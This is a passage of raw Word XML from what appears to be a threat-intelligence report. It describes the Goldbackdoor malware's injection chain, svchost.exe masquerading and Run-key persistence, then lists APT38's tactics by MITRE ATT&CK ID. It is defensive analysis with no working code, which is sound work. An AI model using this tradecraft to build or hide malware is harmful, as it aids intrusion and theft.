          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EA008E" w:rsidRPr="009E4622">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1140 : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA008E" w:rsidRPr="009E4622">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deobfuscate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA008E" w:rsidRPr="009E4622">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/Decode Files or Information</w:t>
      </w:r>
      <w:r w:rsidR="00EA008E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidR="00EA008E" w:rsidRPr="0078645B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005317DB">
        <w:t xml:space="preserve">the payload and uses a standard process involving </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005317DB">
        <w:t>VirtualAllocEx,WriteProcessMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005317DB">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005317DB">
        <w:t>RtlCreateUserThread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005317DB">
        <w:t xml:space="preserve"> to spawn a thread under the previously created process in order to execute it, researchers said.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F096A10" w14:textId="7C2E9BEF" w:rsidR="00CE1300" w:rsidRDefault="00CE1300" w:rsidP="00CE1300">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[5] The final dropper is a shellcode payload running as that thread in a process created by Fantasy to execute the final deployment of the malware. “The payload delivered by this stage is a Windows Portable Executable PE file for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Goldbackdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,” researchers wrote.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8BFC7B" w14:textId="62AFAD48" w:rsidR="00561BB2" w:rsidRDefault="00561BB2" w:rsidP="0078645B">
      <w:r>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:r w:rsidRPr="00561BB2">
        <w:t xml:space="preserve">As we already said </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00561BB2">
        <w:t>there</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00561BB2">
        <w:t xml:space="preserve"> numerous ways trojan can get to your PC from the internet. Gold backdoor copies its file(s) to your hard disk. File name typical to Gold backdoor is svchost.exe</w:t>
      </w:r>
      <w:r w:rsidR="00C37C69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C37C69">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00C37C69" w:rsidRPr="00C37C69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1036.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C37C69" w:rsidRPr="00C37C69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : &lt;Masquerading&gt;:Invalid Code Signature</w:t>
      </w:r>
      <w:r w:rsidR="00C37C69">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidRPr="00561BB2">
        <w:t xml:space="preserve">. Then it runs itself and creates new startup key in registry </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C8263F">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00C8263F" w:rsidRPr="00C8263F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1547.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C8263F" w:rsidRPr="00C8263F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C8263F" w:rsidRPr="00C8263F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C8263F" w:rsidRPr="00C8263F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
      <w:r w:rsidR="00C8263F" w:rsidRPr="00C8263F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C8263F">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00561BB2">
        <w:t>with name Gold backdoor and value svchost.exe. If you will look into running processes list you will see some extra process with name like svchost.exe or any random name that uses decent amount of your CPU.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B451FA" w14:textId="295D980E" w:rsidR="0064704D" w:rsidRPr="0078645B" w:rsidRDefault="0064704D" w:rsidP="0078645B">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r w:rsidRPr="0064704D">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0064704D">
        <w:t>Goldbackdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0064704D">
        <w:t xml:space="preserve"> provides attackers with basic remote command execution, file downloading/uploading, keylogging, and the ability to remotely uninstall,” they wrote. “This functionality and implementation closely match </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0064704D">
        <w:t>Bluelight</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0064704D">
        <w:t>; however, the increased focus appears to have been placed on file collection and keylogging.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B246C8" w14:textId="3A84AE6F" w:rsidR="00891095" w:rsidRDefault="00891095" w:rsidP="005F312C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="356046E7" w14:textId="3AB26AA6" w:rsidR="0042549C" w:rsidRDefault="0042549C" w:rsidP="0042549C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc110935514"/>
      <w:bookmarkStart w:id="80" w:name="_Toc153480869"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>APT38</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="498CECCD" w14:textId="77777777" w:rsidR="0042549C" w:rsidRPr="005B4630" w:rsidRDefault="0042549C" w:rsidP="0042549C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc110935515"/>
      <w:bookmarkStart w:id="82" w:name="_Toc153480870"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="3245E12F" w14:textId="77777777" w:rsidR="00150193" w:rsidRPr="00150193" w:rsidRDefault="00150193" w:rsidP="00150193">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0082 - APT38 is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDCA1B1"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5433CB91"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development ['T1588.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62156E1D"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T1588.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2E32B6"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1566.001', 'T1189']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665C6AB3"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E9532A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E9532A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E9532A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E9532A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0276352A"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1189 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Drive-by Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE24176"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1569.002', 'T1106', 'T1059.005', 'T1053.005', 'T1059.001', 'T1204.002', 'T1053.003', 'T1059.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F5FE00"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T1569.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Services&gt;:Service Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551DFDF6"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1106 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Native API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA4AB3F"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T1059.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4A9AE2"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981B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00981B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B24817B" w14:textId="77777777" w:rsidR="00150193" w:rsidRPr="00E9532A" w:rsidRDefault="00150193" w:rsidP="00150193">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E9532A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E9532A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02881A10"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E9532A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E9532A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5C8B24"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T1053.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Cron</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B52A7D2"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T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFCCF32"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1543.003', 'T1505.003', 'T1053.005', 'T1053.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A59BF1"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T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315C19E2"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T1505.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Server Software Component&gt;:Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3559C8D2" w14:textId="77777777" w:rsidR="00150193" w:rsidRPr="00981B9C" w:rsidRDefault="00150193" w:rsidP="00150193">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00981B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00981B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5079F256"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T1053.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Cron</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7152A31B"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1543.003', 'T1053.005', 'T1053.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A484929"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T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122B513C"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D82C23"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T1053.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Cron</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A21FD2D"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1218.001', 'T1070.006', 'T1562.003', 'T1562.004', 'T1218.011', 'T1112', 'T1070.001', 'T1070.004', 'T1027.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FA859B"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T1218.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Compiled HTML File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E4787A" w14:textId="77777777" w:rsidR="00150193" w:rsidRPr="00BA36D8" w:rsidRDefault="00150193" w:rsidP="00150193">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BA36D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1070.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BA36D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA36D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Timestomp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CEED31C"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T1562.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;:Impair Command History Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0125BD81"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T1562.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defenses</w:t>
      </w:r>
